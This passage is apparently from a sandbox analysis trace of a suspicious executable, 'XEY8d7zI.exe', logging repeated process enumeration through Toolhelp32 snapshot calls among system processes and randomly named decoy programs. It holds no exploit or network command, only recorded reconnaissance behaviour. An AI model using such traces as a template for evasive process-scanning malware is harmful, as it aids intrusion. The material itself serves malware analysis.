th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0131.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0131.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0131.024] CloseHandle (hObject=0xbc) returned 1 [0131.024] Sleep (dwMilliseconds=0x12c) [0131.380] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0131.385] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0131.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0131.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0131.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0131.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0131.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0131.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0131.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0131.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0131.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0131.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0131.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0131.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0131.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0131.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0131.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0131.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0131.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0131.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0131.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0131.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0131.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0131.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0131.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0131.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0131.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0131.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0131.419] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0131.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0131.422] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0131.423] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0131.510] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0131.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0131.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0131.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0131.515] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0131.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0131.519] CloseHandle (hObject=0xc4) returned 1 [0131.519] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0131.524] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0131.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0131.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0131.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0131.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0131.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0131.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0131.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0131.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0131.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0131.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0131.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0131.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0131.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0131.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0131.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0131.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0131.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0131.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0131.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0131.577] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0131.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 